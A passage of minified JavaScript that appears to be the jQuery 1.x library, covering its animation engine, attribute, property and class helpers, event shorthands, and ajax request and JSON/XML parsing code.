this.pos=b=this.options.duration?n.easing[this.easing](a,this.options.duration*a,0,1,this.options.duration):a,this.now=(this.end-this.start)*b+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),c&&c.set?c.set(this):$b.propHooks._default.set(this),this}},$b.prototype.init.prototype=$b.prototype,$b.propHooks={_default:{get:function(a){var b;return null==a.elem[a.prop]||a.elem.style&&null!=a.elem.style[a.prop]?(b=n.css(a.elem,a.prop,""),b&&"auto"!==b?b:0):a.elem[a.prop]},set:function(a){n.fx.step[a.prop]?n.fx.step[a.prop](a):a.elem.style&&(null!=a.elem.style[n.cssProps[a.prop]]||n.cssHooks[a.prop])?n.style(a.elem,a.prop,a.now+a.unit):a.elem[a.prop]=a.now}}},$b.propHooks.scrollTop=$b.propHooks.scrollLeft={set:function(a){a.elem.nodeType&&a.elem.parentNode&&(a.elem[a.prop]=a.now)}},n.easing={linear:function(a){return a},swing:function(a){return.5-Math.cos(a*Math.PI)/2}},n.fx=$b.prototype.init,n.fx.step={};var _b,ac,bc=/^(?:toggle|show|hide)$/,cc=new RegExp("^(?:([+-])=|)("+T+")([a-z%]*)$","i"),dc=/queueHooks$/,ec=[jc],fc={"*":[function(a,b){var c=this.createTween(a,b),d=c.cur(),e=cc.exec(b),f=e&&e[3]||(n.cssNumber[a]?"":"px"),g=(n.cssNumber[a]||"px"!==f&&+d)&&cc.exec(n.css(c.elem,a)),h=1,i=20;if(g&&g[3]!==f){f=f||g[3],e=e||[],g=+d||1;do h=h||".5",g/=h,n.style(c.elem,a,g+f);while(h!==(h=c.cur()/d)&&1!==h&&--i)}return e&&(g=c.start=+g||+d||0,c.unit=f,c.end=e[1]?g+(e[1]+1)*e[2]:+e[2]),c}]};function gc(){return setTimeout(function(){_b=void 0}),_b=n.now()}function hc(a,b){var c,d={height:a},e=0;for(b=b?1:0;4>e;e+=2-b)c=U[e],d["margin"+c]=d["padding"+c]=a;return b&&(d.opacity=d.width=a),d}function ic(a,b,c){for(var d,e=(fc[b]||[]).concat(fc["*"]),f=0,g=e.length;g>f;f++)if(d=e[f].call(c,b,a))return d}function jc(a,b,c){var d,e,f,g,h,i,j,k,m=this,o={},p=a.style,q=a.nodeType&&V(a),r=n._data(a,"fxshow");c.queue||(h=n._queueHooks(a,"fx"),null==h.unqueued&&(h.unqueued=0,i=h.empty.fire,h.empty.fire=function(){h.unqueued||i()}),h.unqueued++,m.always(function(){m.always(function(){h.unqueued--,n.queue(a,"fx").length||h.empty.fire()})})),1===a.nodeType&&("height"in b||"width"in b)&&(c.overflow=[p.overflow,p.overflowX,p.overflowY],j=n.css(a,"display"),k=Gb(a.nodeName),"none"===j&&(j=k),"inline"===j&&"none"===n.css(a,"float")&&(l.inlineBlockNeedsLayout&&"inline"!==k?p.zoom=1:p.display="inline-block")),c.overflow&&(p.overflow="hidden",l.shrinkWrapBlocks()||m.always(function(){p.overflow=c.overflow[0],p.overflowX=c.overflow[1],p.overflowY=c.overflow[2]}));for(d in b)if(e=b[d],bc.exec(e)){if(delete b[d],f=f||"toggle"===e,e===(q?"hide":"show")){if("show"!==e||!r||void 0===r[d])continue;q=!0}o[d]=r&&r[d]||n.style(a,d)}if(!n.isEmptyObject(o)){r?"hidden"in r&&(q=r.hidden):r=n._data(a,"fxshow",{}),f&&(r.hidden=!q),q?n(a).show():m.done(function(){n(a).hide()}),m.done(function(){var b;n._removeData(a,"fxshow");for(b in o)n.style(a,b,o[b])});for(d in o)g=ic(q?r[d]:0,d,m),d in r||(r[d]=g.start,q&&(g.end=g.start,g.start="width"===d||"height"===d?1:0))}}function kc(a,b){var c,d,e,f,g;for(c in a)if(d=n.camelCase(c),e=b[d],f=a[c],n.isArray(f)&&(e=f[1],f=a[c]=f[0]),c!==d&&(a[d]=f,delete a[c]),g=n.cssHooks[d],g&&"expand"in g){f=g.expand(f),delete a[d];for(c in f)c in a||(a[c]=f[c],b[c]=e)}else b[d]=e}function lc(a,b,c){var d,e,f=0,g=ec.length,h=n.Deferred().always(function(){delete i.elem}),i=function(){if(e)return!1;for(var b=_b||gc(),c=Math.max(0,j.startTime+j.duration-b),d=c/j.duration||0,f=1-d,g=0,i=j.tweens.length;i>g;g++)j.tweens[g].run(f);return h.notifyWith(a,[j,f,c]),1>f&&i?c:(h.resolveWith(a,[j]),!1)},j=h.promise({elem:a,props:n.extend({},b),opts:n.extend(!0,{specialEasing:{}},c),originalProperties:b,originalOptions:c,startTime:_b||gc(),duration:c.duration,tweens:[],createTween:function(b,c){var d=n.Tween(a,j.opts,b,c,j.opts.specialEasing[b]||j.opts.easing);return j.tweens.push(d),d},stop:function(b){var c=0,d=b?j.tweens.length:0;if(e)return this;for(e=!0;d>c;c++)j.tweens[c].run(1);return b?h.resolveWith(a,[j,b]):h.rejectWith(a,[j,b]),this}}),k=j.props;for(kc(k,j.opts.specialEasing);g>f;f++)if(d=ec[f].call(j,a,k,j.opts))return d;return n.map(k,ic,j),n.isFunction(j.opts.start)&&j.opts.start.call(a,j),n.fx.timer(n.extend(i,{elem:a,anim:j,queue:j.opts.queue})),j.progress(j.opts.progress).done(j.opts.done,j.opts.complete).fail(j.opts.fail).always(j.opts.always)}n.Animation=n.extend(lc,{tweener:function(a,b){n.isFunction(a)?(b=a,a=["*"]):a=a.split(" ");for(var c,d=0,e=a.length;e>d;d++)c=a[d],fc[c]=fc[c]||[],fc[c].unshift(b)},prefilter:function(a,b){b?ec.unshift(a):ec.push(a)}}),n.speed=function(a,b,c){var d=a&&"object"==typeof a?n.extend({},a):{complete:c||!c&&b||n.isFunction(a)&&a,duration:a,easing:c&&b||b&&!n.isFunction(b)&&b};return d.duration=n.fx.off?0:"number"==typeof d.duration?d.duration:d.duration in n.fx.speeds?n.fx.speeds[d.duration]:n.fx.speeds._default,(null==d.queue||d.queue===!0)&&(d.queue="fx"),d.old=d.complete,d.complete=function(){n.isFunction(d.old)&&d.old.call(this),d.queue&&n.dequeue(this,d.queue)},d},n.fn.extend({fadeTo:function(a,b,c,d){return this.filter(V).css("opacity",0).show().end().animate({opacity:b},a,c,d)},animate:function(a,b,c,d){var e=n.isEmptyObject(a),f=n.speed(b,c,d),g=function(){var b=lc(this,n.extend({},a),f);(e||n._data(this,"finish"))&&b.stop(!0)};return g.finish=g,e||f.queue===!1?this.each(g):this.queue(f.queue,g)},stop:function(a,b,c){var d=function(a){var b=a.stop;delete a.stop,b(c)};return"string"!=typeof a&&(c=b,b=a,a=void 0),b&&a!==!1&&this.queue(a||"fx",[]),this.each(function(){var b=!0,e=null!=a&&a+"queueHooks",f=n.timers,g=n._data(this);if(e)g[e]&&g[e].stop&&d(g[e]);else for(e in g)g[e]&&g[e].stop&&dc.test(e)&&d(g[e]);for(e=f.length;e--;)f[e].elem!==this||null!=a&&f[e].queue!==a||(f[e].anim.stop(c),b=!1,f.splice(e,1));(b||!c)&&n.dequeue(this,a)})},finish:function(a){return a!==!1&&(a=a||"fx"),this.each(function(){var b,c=n._data(this),d=c[a+"queue"],e=c[a+"queueHooks"],f=n.timers,g=d?d.length:0;for(c.finish=!0,n.queue(this,a,[]),e&&e.stop&&e.stop.call(this,!0),b=f.length;b--;)f[b].elem===this&&f[b].queue===a&&(f[b].anim.stop(!0),f.splice(b,1));for(b=0;g>b;b++)d[b]&&d[b].finish&&d[b].finish.call(this);delete c.finish})}}),n.each(["toggle","show","hide"],function(a,b){var c=n.fn[b];n.fn[b]=function(a,d,e){return null==a||"boolean"==typeof a?c.apply(this,arguments):this.animate(hc(b,!0),a,d,e)}}),n.each({slideDown:hc("show"),slideUp:hc("hide"),slideToggle:hc("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(a,b){n.fn[a]=function(a,c,d){return this.animate(b,a,c,d)}}),n.timers=[],n.fx.tick=function(){var a,b=n.timers,c=0;for(_b=n.now();c<b.length;c++)a=b[c],a()||b[c]!==a||b.splice(c--,1);b.length||n.fx.stop(),_b=void 0},n.fx.timer=function(a){n.timers.push(a),a()?n.fx.start():n.timers.pop()},n.fx.interval=13,n.fx.start=function(){ac||(ac=setInterval(n.fx.tick,n.fx.interval))},n.fx.stop=function(){clearInterval(ac),ac=null},n.fx.speeds={slow:600,fast:200,_default:400},n.fn.delay=function(a,b){return a=n.fx?n.fx.speeds[a]||a:a,b=b||"fx",this.queue(b,function(b,c){var d=setTimeout(b,a);c.stop=function(){clearTimeout(d)}})},function(){var a,b,c,d,e=z.createElement("div");e.setAttribute("className","t"),e.innerHTML="  <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",a=e.getElementsByTagName("a")[0],c=z.createElement("select"),d=c.appendChild(z.createElement("option")),b=e.getElementsByTagName("input")[0],a.style.cssText="top:1px",l.getSetAttribute="t"!==e.className,l.style=/top/.test(a.getAttribute("style")),l.hrefNormalized="/a"===a.getAttribute("href"),l.checkOn=!!b.value,l.optSelected=d.selected,l.enctype=!!z.createElement("form").enctype,c.disabled=!0,l.optDisabled=!d.disabled,b=z.createElement("input"),b.setAttribute("value",""),l.input=""===b.getAttribute("value"),b.value="t",b.setAttribute("type","radio"),l.radioValue="t"===b.value,a=b=c=d=e=null}();var mc=/\r/g;n.fn.extend({val:function(a){var b,c,d,e=this[0];{if(arguments.length)return d=n.isFunction(a),this.each(function(c){var e;1===this.nodeType&&(e=d?a.call(this,c,n(this).val()):a,null==e?e="":"number"==typeof e?e+="":n.isArray(e)&&(e=n.map(e,function(a){return null==a?"":a+""})),b=n.valHooks[this.type]||n.valHooks[this.nodeName.toLowerCase()],b&&"set"in b&&void 0!==b.set(this,e,"value")||(this.value=e))});if(e)return b=n.valHooks[e.type]||n.valHooks[e.nodeName.toLowerCase()],b&&"get"in b&&void 0!==(c=b.get(e,"value"))?c:(c=e.value,"string"==typeof c?c.replace(mc,""):null==c?"":c)}}}),n.extend({valHooks:{option:{get:function(a){var b=n.find.attr(a,"value");return null!=b?b:n.text(a)}},select:{get:function(a){for(var b,c,d=a.options,e=a.selectedIndex,f="select-one"===a.type||0>e,g=f?null:[],h=f?e+1:d.length,i=0>e?h:f?e:0;h>i;i++)if(c=d[i],!(!c.selected&&i!==e||(l.optDisabled?c.disabled:null!==c.getAttribute("disabled"))||c.parentNode.disabled&&n.nodeName(c.parentNode,"optgroup"))){if(b=n(c).val(),f)return b;g.push(b)}return g},set:function(a,b){var c,d,e=a.options,f=n.makeArray(b),g=e.length;while(g--)if(d=e[g],n.inArray(n.valHooks.option.get(d),f)>=0)try{d.selected=c=!0}catch(h){d.scrollHeight}else d.selected=!1;return c||(a.selectedIndex=-1),e}}}}),n.each(["radio","checkbox"],function(){n.valHooks[this]={set:function(a,b){return n.isArray(b)?a.checked=n.inArray(n(a).val(),b)>=0:void 0}},l.checkOn||(n.valHooks[this].get=function(a){return null===a.getAttribute("value")?"on":a.value})});var nc,oc,pc=n.expr.attrHandle,qc=/^(?:checked|selected)$/i,rc=l.getSetAttribute,sc=l.input;n.fn.extend({attr:function(a,b){return W(this,n.attr,a,b,arguments.length>1)},removeAttr:function(a){return this.each(function(){n.removeAttr(this,a)})}}),n.extend({attr:function(a,b,c){var d,e,f=a.nodeType;if(a&&3!==f&&8!==f&&2!==f)return typeof a.getAttribute===L?n.prop(a,b,c):(1===f&&n.isXMLDoc(a)||(b=b.toLowerCase(),d=n.attrHooks[b]||(n.expr.match.bool.test(b)?oc:nc)),void 0===c?d&&"get"in d&&null!==(e=d.get(a,b))?e:(e=n.find.attr(a,b),null==e?void 0:e):null!==c?d&&"set"in d&&void 0!==(e=d.set(a,c,b))?e:(a.setAttribute(b,c+""),c):void n.removeAttr(a,b))},removeAttr:function(a,b){var c,d,e=0,f=b&&b.match(F);if(f&&1===a.nodeType)while(c=f[e++])d=n.propFix[c]||c,n.expr.match.bool.test(c)?sc&&rc||!qc.test(c)?a[d]=!1:a[n.camelCase("default-"+c)]=a[d]=!1:n.attr(a,c,""),a.removeAttribute(rc?c:d)},attrHooks:{type:{set:function(a,b){if(!l.radioValue&&"radio"===b&&n.nodeName(a,"input")){var c=a.value;return a.setAttribute("type",b),c&&(a.value=c),b}}}}}),oc={set:function(a,b,c){return b===!1?n.removeAttr(a,c):sc&&rc||!qc.test(c)?a.setAttribute(!rc&&n.propFix[c]||c,c):a[n.camelCase("default-"+c)]=a[c]=!0,c}},n.each(n.expr.match.bool.source.match(/\w+/g),function(a,b){var c=pc[b]||n.find.attr;pc[b]=sc&&rc||!qc.test(b)?function(a,b,d){var e,f;return d||(f=pc[b],pc[b]=e,e=null!=c(a,b,d)?b.toLowerCase():null,pc[b]=f),e}:function(a,b,c){return c?void 0:a[n.camelCase("default-"+b)]?b.toLowerCase():null}}),sc&&rc||(n.attrHooks.value={set:function(a,b,c){return n.nodeName(a,"input")?void(a.defaultValue=b):nc&&nc.set(a,b,c)}}),rc||(nc={set:function(a,b,c){var d=a.getAttributeNode(c);return d||a.setAttributeNode(d=a.ownerDocument.createAttribute(c)),d.value=b+="","value"===c||b===a.getAttribute(c)?b:void 0}},pc.id=pc.name=pc.coords=function(a,b,c){var d;return c?void 0:(d=a.getAttributeNode(b))&&""!==d.value?d.value:null},n.valHooks.button={get:function(a,b){var c=a.getAttributeNode(b);return c&&c.specified?c.value:void 0},set:nc.set},n.attrHooks.contenteditable={set:function(a,b,c){nc.set(a,""===b?!1:b,c)}},n.each(["width","height"],function(a,b){n.attrHooks[b]={set:function(a,c){return""===c?(a.setAttribute(b,"auto"),c):void 0}}})),l.style||(n.attrHooks.style={get:function(a){return a.style.cssText||void 0},set:function(a,b){return a.style.cssText=b+""}});var tc=/^(?:input|select|textarea|button|object)$/i,uc=/^(?:a|area)$/i;n.fn.extend({prop:function(a,b){return W(this,n.prop,a,b,arguments.length>1)},removeProp:function(a){return a=n.propFix[a]||a,this.each(function(){try{this[a]=void 0,delete this[a]}catch(b){}})}}),n.extend({propFix:{"for":"htmlFor","class":"className"},prop:function(a,b,c){var d,e,f,g=a.nodeType;if(a&&3!==g&&8!==g&&2!==g)return f=1!==g||!n.isXMLDoc(a),f&&(b=n.propFix[b]||b,e=n.propHooks[b]),void 0!==c?e&&"set"in e&&void 0!==(d=e.set(a,c,b))?d:a[b]=c:e&&"get"in e&&null!==(d=e.get(a,b))?d:a[b]},propHooks:{tabIndex:{get:function(a){var b=n.find.attr(a,"tabindex");return b?parseInt(b,10):tc.test(a.nodeName)||uc.test(a.nodeName)&&a.href?0:-1}}}}),l.hrefNormalized||n.each(["href","src"],function(a,b){n.propHooks[b]={get:function(a){return a.getAttribute(b,4)}}}),l.optSelected||(n.propHooks.selected={get:function(a){var b=a.parentNode;return b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex),null}}),n.each(["tabIndex","readOnly","maxLength","cellSpacing","cellPadding","rowSpan","colSpan","useMap","frameBorder","contentEditable"],function(){n.propFix[this.toLowerCase()]=this}),l.enctype||(n.propFix.enctype="encoding");var vc=/[\t\r\n\f]/g;n.fn.extend({addClass:function(a){var b,c,d,e,f,g,h=0,i=this.length,j="string"==typeof a&&a;if(n.isFunction(a))return this.each(function(b){n(this).addClass(a.call(this,b,this.className))});if(j)for(b=(a||"").match(F)||[];i>h;h++)if(c=this[h],d=1===c.nodeType&&(c.className?(" "+c.className+" ").replace(vc," "):" ")){f=0;while(e=b[f++])d.indexOf(" "+e+" ")<0&&(d+=e+" ");g=n.trim(d),c.className!==g&&(c.className=g)}return this},removeClass:function(a){var b,c,d,e,f,g,h=0,i=this.length,j=0===arguments.length||"string"==typeof a&&a;if(n.isFunction(a))return this.each(function(b){n(this).removeClass(a.call(this,b,this.className))});if(j)for(b=(a||"").match(F)||[];i>h;h++)if(c=this[h],d=1===c.nodeType&&(c.className?(" "+c.className+" ").replace(vc," "):"")){f=0;while(e=b[f++])while(d.indexOf(" "+e+" ")>=0)d=d.replace(" "+e+" "," ");g=a?n.trim(d):"",c.className!==g&&(c.className=g)}return this},toggleClass:function(a,b){var c=typeof a;return"boolean"==typeof b&&"string"===c?b?this.addClass(a):this.removeClass(a):this.each(n.isFunction(a)?function(c){n(this).toggleClass(a.call(this,c,this.className,b),b)}:function(){if("string"===c){var b,d=0,e=n(this),f=a.match(F)||[];while(b=f[d++])e.hasClass(b)?e.removeClass(b):e.addClass(b)}else(c===L||"boolean"===c)&&(this.className&&n._data(this,"__className__",this.className),this.className=this.className||a===!1?"":n._data(this,"__className__")||"")})},hasClass:function(a){for(var b=" "+a+" ",c=0,d=this.length;d>c;c++)if(1===this[c].nodeType&&(" "+this[c].className+" ").replace(vc," ").indexOf(b)>=0)return!0;return!1}}),n.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(a,b){n.fn[b]=function(a,c){return arguments.length>0?this.on(b,null,a,c):this.trigger(b)}}),n.fn.extend({hover:function(a,b){return this.mouseenter(a).mouseleave(b||a)},bind:function(a,b,c){return this.on(a,null,b,c)},unbind:function(a,b){return this.off(a,null,b)},delegate:function(a,b,c,d){return this.on(b,a,c,d)},undelegate:function(a,b,c){return 1===arguments.length?this.off(a,"**"):this.off(b,a||"**",c)}});var wc=n.now(),xc=/\?/,yc=/(,)|(\[|{)|(}|])|"(?:[^"\\\r\n]|\\["\\\/bfnrt]|\\u[\da-fA-F]{4})*"\s*:?|true|false|null|-?(?!0\d)\d+(?:\.\d+|)(?:[eE][+-]?\d+|)/g;n.parseJSON=function(b){if(a.JSON&&a.JSON.parse)return a.JSON.parse(b+"");var c,d=null,e=n.trim(b+"");return e&&!n.trim(e.replace(yc,function(a,b,e,f){return c&&b&&(d=0),0===d?a:(c=e||b,d+=!f-!e,"")}))?Function("return "+e)():n.error("Invalid JSON: "+b)},n.parseXML=function(b){var c,d;if(!b||"string"!=typeof b)return null;try{a.DOMParser?(d=new DOMParser,c=d.parseFromString(b,"text/xml")):(c=new ActiveXObject("Microsoft.XMLDOM"),c.async="false",c.loadXML(b))}catch(e){c=void 0}return c&&c.documentElement&&!c.getElementsByTagName("parsererror").length||n.error("Invalid XML: "+b),c};var zc,Ac,Bc=/#.*$/,Cc=/([?&])_=[^&]*/,Dc=/^(.*?):[ \t]*([^\r\n]*)\r?$/gm,Ec=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,Fc=/^(?:GET|HEAD)$/,Gc=/^\/\//,Hc=/^([\w.+-]+:)(?:\/\/(?:[^\/?#]*@|)([^\/?#:]*)(?::(\d+)|)|)/,Ic={},Jc={},Kc="*/".concat("*");try{Ac=location.href}catch(Lc){Ac=z.createElement("a"),Ac.href="",Ac=Ac.href}zc=Hc.exec(Ac.toLowerCase())||[];function Mc(a){return function(b,c){"string"!=typeof b&&(c=b,b="*");var d,e=0,f=b.toLowerCase().match(F)||[];if(n.isFunction(c))while(d=f[e++])"+"===d.charAt(0)?(d=d.slice(1)||"*",(a[d]=a[d]||[]).unshift(c)):(a[d]=a[d]||[]).push(c)}}function Nc(a,b,c,d){var e={},f=a===Jc;function g(h){var i;return e[h]=!0,n.each(a[h]||[],function(a,h){var j=h(b,c,d);return"string"!=typeof j||f||e[j]?f?!(i=j):void 0:(b.dataTypes.unshift(j),g(j),!1)}),i}return g(b.dataTypes[0])||!e["*"]&&g("*")}function Oc(a,b){var c,d,e=n.ajaxSettings.flatOptions||{};for(d in b)void 0!==b[d]&&((e[d]?a:c||(c={}))[d]=b[d]);return c&&n.extend(!0,a,c),a}function Pc(a,b,c){var d,e,f,g,h=a.contents,i=a.dataTypes;while("*"===i[0])i.shift(),void 0===e&&(e=a.mimeType||b.getResponseHeader("Content-Type"));if(e)for(g in h)if(h[g]&&h[g].test(e)){i.unshift(g);break}if(i[0]in c)f=i[0];else{for(g in c){if(!i[0]||a.converters[g+" "+i[0]]){f=g;break}d||(d=g)}f=f||d}return f?(f!==i[0]&&i.unshift(f),c[f]):void 0}function Qc(a,b,c,d){var e,f,g,h,i,j={},k=a.dataTypes.slice();if(k[1])for(g in a.converters)j[g.toLowerCase()]=a.converters[g];f=k.shift();while(f)if(a.responseFields[f]&&(c[a.responseFields[f]]=b),!i&&d&&a.dataFilter&&(b=a.dataFilter(b,a.dataType)),i=f,f=k.shift())if("*"===f)f=i;else if("*"!==i&&i!==f){if(g=j[i+" "+f]||j["* "+f],!g)for(e in j)if(h=e.split(" "),h[1]===f&&(g=j[i+" "+h[0]]||j["* "+h[0]])){g===!0?g=j[e]:j[e]!==!0&&(f=h[0],k.unshift(h[1]));break}if(g!==!0)if(g&&a["throws"])b=g(b);else try{b=g(b)}catch(l){return{state:"parsererror",error:g?l:"No conversion from "+i+" to "+f}}}return{state:"success",data:b}}n.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:Ac,type:"GET",isLocal:Ec.test(zc[1]),global:!0,processData:!0,async:!0,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":Kc,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText",json:"responseJSON"},converters:{"* text":String,"text html":!0,"text json":n.parseJSON,"text xml":n.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(a,b){return b?Oc(Oc(a,n.ajaxSettings),b):Oc(n.ajaxSettings,a)},ajaxPrefilter:Mc(Ic),ajaxTransport:Mc(Jc),ajax:function(a,b){"object"==typeof a&&(b=a,a=void 0),b=b||{};var c,d,e,f,g,h,i,j,k=n.ajaxSetup({},b),l=k.context||k,m=k.context&&(l.nodeType||l.jquery)?n(l):n.event,o=n.Deferred(),p=n.Callbacks("once memory"),q=k.statusCode||{},r={},s={},t=0,u="canceled",v={readyState:0,getResponseHeader:function(a){var b;if(2===t){if(!j){j={};while(b=Dc.exec(f))j[b[1].toLowerCase()]=b[2]}b=j[a.toLowerCase()]}return null==b?null:b},getAllResponseHeaders:function(){return 2===t?f:null},setRequestHeader:function(a,b){var c=a.toLowerCase();return t||(a=s[c]=s[c]||a,r[a]=b),this},overrideMimeType:function(a){return t||(k.mimeType=a),this},statusCode:function(a){var b;if(a)if(2>t)for(b in a)q[b]=[q[b],a[b]];else v.always(a[v.status]);return this},abort:function(a){var b=a||u;return i&&i.abort(b),x(0,b),this}};if(o.promise(v).complete=p.add,v.success=v.done,v.error=v.fail,k.url=((a||k.url||Ac)+"").replace(Bc,"").replace(Gc,zc[1]+"//"),k.type=b.method||b.type||k.method||k.type,k.dataTypes=n.trim(k.dataType||"*").toLowerCase().match(F)||[""],null==k.crossDomain&&(c=Hc.exec(k.url.toLowerCase()),k.crossDomain=!(!c||c[1]===zc[1]&&c[2]===zc[2]&&(c[3]||("http:"===c[1]?"80":"443"))===(zc[3]||("http:"===zc[1]?"80":"443")))),k.data&&k.processData&&"string"!=typeof k.data&&(k.data=n.param(k.data,k.traditional)),Nc(Ic,k,b,v),2===t)return v;h=k.global,h&&0===n.active++&&n.event.trigger("ajaxStart"),k.type=k.type.toUpperCase(),k.hasContent=!Fc.test(k.type),e=k.url,k.hasContent||(k.data&&(e=k.url+=(xc.test(e)?"&":"?")+k.data,delete k.data),k.cache===!1&&(k.url=Cc.test(e)?e.replace(Cc,"$1_="+wc++):e+(xc.test(e)?"&":"?")+"_="+wc++)),k.ifModified&&(n.lastModified[e]&&v.setRequestHeader("If-Modified-Since",n.lastModified[e]),n.etag[e]&&v.setRequestHeader("If-None-Match",n.etag[e])),(k.data&&k.hasContent&&k.contentType!==!1||b.contentType)&&v.setRequestHeader("Content-Type",k.contentType),v.setRequestHeader("Accept",k.dataTypes[0]&&k.accepts[k.dataTypes[0]]?k.accepts[k.dataTypes[0]]+("*"!==k.dataTypes[0]?", "+Kc+"; q=0.01":""):k.accepts["*"]);for(d in k.headers)v.setRequestHeader(d,k.headers[d]);if(k.beforeSend&&(k.beforeSend.call(l,v,k)===!1||2===t))return v.abort();u="abort";for(d in{success:1,error:1,complete:1})v[d](k[d]);if(i=Nc(Jc,k,b,v)){v.readyState=1,h&&m.trigger("ajaxSend",[v,k]),k.async&&k.timeout>0&&(g=setTimeout(function(){v.abort("timeout")},k.timeout));try{t=1,i.send(r,x)}catch(w){if(!(2>t))throw w;x(-1,w)}}else x(-1,"No Transport");function x(a,b,c,d){var j,r,s,u,w,x=b;2!==t&&(t=2,g&&clearTimeout(g),i=void 0,f=d||"",v.readyState=a>0?4:0,j=a>=200&&300>a||304===a,c&&(u=Pc(k,v,c)),u=Qc(k,u,v,j),j?(k.ifModified&&(w=v.getResponseHeader("Last-Modified"),w&&(n.lastModified[e]=w),w=v.getResponseHeader("etag"),w&&(n.etag[e]=w)),204===a||"HEAD"===k.type?x="nocontent":304===a?x="notmodified":(x=u.state,r=u.data,s=u.error,j=!s)):(s=x,(a||!x)&&(x="error",0>a&&(a=0))),v.status=a,v.statusText=(b||x)+"",j?o.resolveWith(l,[r,x,v]):o.rejectWith(l,[v,x,s]),v.statusCode(q),q=void 0,h&&m.trigger(j?"ajaxSuccess":"ajaxError",[v,k,j?r:s]),p.fireWith(l,[v,x]),h&&(m.trigger("ajaxComplete",[v,k]),--n.active||n.event.trigger("ajaxStop")))}return v},getJSON:function(a,b,c){return n.get(a,b,c,"json")},getScript:function(a,b){return n.get(a,void 0,b,"script")}}),n.each(["get","post"],function(a,b){n[b]=function(a,c,d,e){return n.isFunction(c)&&(e=e||d,d=c,c=void 0),n.ajax({url:a,type:b,dataType:e,data:c,success:d})}}),n.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(a,b){n.fn[b]=function(a){return this.on(b,a)}}),n._evalUrl=function(a){return n.ajax({url:a,type:"GET",dataType:"script",async:!1,global:!1,"throws":!0})},n.fn.extend({wrapAll:function(a){if(n.isFunction(a))return this.each(function(b){n(this).wrapAll(a.call(this,b))});if(this[0]){var b=n(a,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&b.insertBefore(this[0]),b.map(function(){var a=this;while(a.firstChild&&1===a.firstChild.nodeType)a=a.firstChild;return a}).append(this)}return this},wrapInner:function(a){return this.each(n.isFunction(a)?function(b){n(this).wrapInner(a.call(this,b))}:function(){var b=n(this),c=b.contents();c.length?c.wrapAll(a):b.append(a)})},wrap:function(a){var b=n.isFunction(a);return this.each(function(c){n(this).wrapAll(b?a.call(this,c):a)})},unwrap:function(){return this.parent().each(function(){n.nodeName(this,"body")||n(this).replaceWith(this.childNodes)}).end()}}),n.expr.filters.hidden=function(a){return a.offsetWidth<=0&&a.offsetHeight<=0||!l.reliableHiddenOffsets()&&"none"===(a.style&&a.style.display||n.css(a,"display"))},n.expr.filters.visible=function(a){return!n.expr.filters.hidden(a)};var Rc=/%20/g,Sc=/\[\]$/,Tc=/\r?\n/g,Uc=/^(?:submit|button|image|reset|file)$/i,Vc=/^(?:input|select|textarea|keygen)/i;function Wc(a,b,c,d){var e;if(n.isArray(b))n.each(b,function(b,e){c||Sc.test(a)?d(a,e):Wc(a+"["+("object"==typeof e?b:"")+"]",e,c,d)});else if(c||"object"!==n.type(b))d(a,b);else for(e in b)Wc(a+"["+e+"]",b[e],c,d)}n.param=function(a,b){var c,d=[],e=function(a,b){b=n.isFunction(b)?b():null==b?"":b,d[d.length]=encodeURIComponent(a)+"="+encodeURIComponent(b)};if(void 0===b&&(b=n.ajaxSettings&&n.ajaxSettings.traditional),n.isArray(a)||a.jquery&&!n.isPlainObject(a))n.each(a,function(){e(this.name,this.value)});else for(c in a)Wc(c,a[c],b,e);return d.join("&").replace(Rc,"+")},n.fn.extend({serialize:function(){return n.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var a=n.prop(this,"elements");return a?n.makeArray(a):this}).filter(function(){var a=this.type;return this.name&&!n(this).is(":disabled")&&Vc.test(this.nodeName)&&!Uc.test(a)&&(this.checked||!X.test(a))}).map(function(a,b){var c=n(this).val();return null==c?null:n.isArray(c)?n.map(c,function(a){return{name:b.name,value:a.replace(Tc,"\r\n")}}):{name:b.name,value:c.replace(Tc,"\r\n")}}).get()}}),n.ajaxSettings.xhr=void 0!==a.ActiveXObject?function(){return!this.isLocal&&/^(get|post|head|put|delete|options)$/i.test(this.type)&&$c()||_c()}:$c;var Xc=0,Yc={},Zc=n.ajaxSettings.xhr();a.ActiveXObject&&n(a).on("unload",function(){for(var a in Yc)Yc[a](void 0,!0)}),l.cors=!!Zc&&"withCredentials"in Zc,Zc=l.ajax=!!Zc,Zc&&n.ajaxTransport(function(a){if(!a.crossDomain||l.cors){var b;return{send:function(c,d){var e,f=a.xhr(),g=++Xc;if(f.open(a.type,a.url,a.async,a.username,a.password),a.xhrFields)for(e in a.xhrFields)f[e]=a.xhrFields[e];a.mimeType&&f.overrideMimeType&&f.overrideMimeType(a.mimeType),a.crossDomain||c["X-Requested-With"]||(c["X-Requested-With"]="XMLHttpRequest");for(e in c)void 0!==c[e]&&f.setRequestHeader(e,c[e]+"");f.send(a.hasContent&&a.data||null),b=function(c,e){var h,i,j;if(b&&(e||4===f.readyState))if(delete Yc[g],b=void 0,f.onreadystatechange=n.noop,e)4!==f.readyState&&f.abort();else{j={},h=f.status,"string"==typeof f.responseText&&(j.text=f.responseText);try{i=f.statusText}catch(k){i=""}h||!a.isLocal||a.crossDomain?1223===h&&(h=204):h=j.text?200:404}j&&d(h,i,j,f.getAllResponseHeaders())},a.async?4===f.readyState?setTimeout(b):f.onreadystatechange=Yc[g]=b:b()},abort:function(){b&&b(void 0,!0)}}}});function $c(){try{return new a.XMLHttpRequest}catch(b){}}function _c(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}n.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, 